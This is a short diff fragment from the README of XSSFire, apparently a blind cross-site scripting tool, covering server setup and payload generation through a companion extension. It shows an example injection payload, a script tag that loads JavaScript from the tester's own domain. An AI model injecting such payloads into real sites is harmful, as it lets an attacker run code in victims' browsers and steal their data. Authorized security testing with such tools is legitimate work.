SeifElsallamy/XSSFire/README.md

 9. Upload the script to your server.

-To generate payloads you might consider using the Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager You can simply create payloads through this extension by entering yourdomain.com/XSSFire.js in the domain field and click Save.
+To generate payloads you might consider using the Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager You can simply create payloads through this extension by entering yourdomain.com/<script path> in the domain field and click Save.

 Note: you can change the file name to index.php and upload it to your server main directory to make the payloads shorter, then the payload should look similar to this `<script src="https://yourdomain.com"></script>`.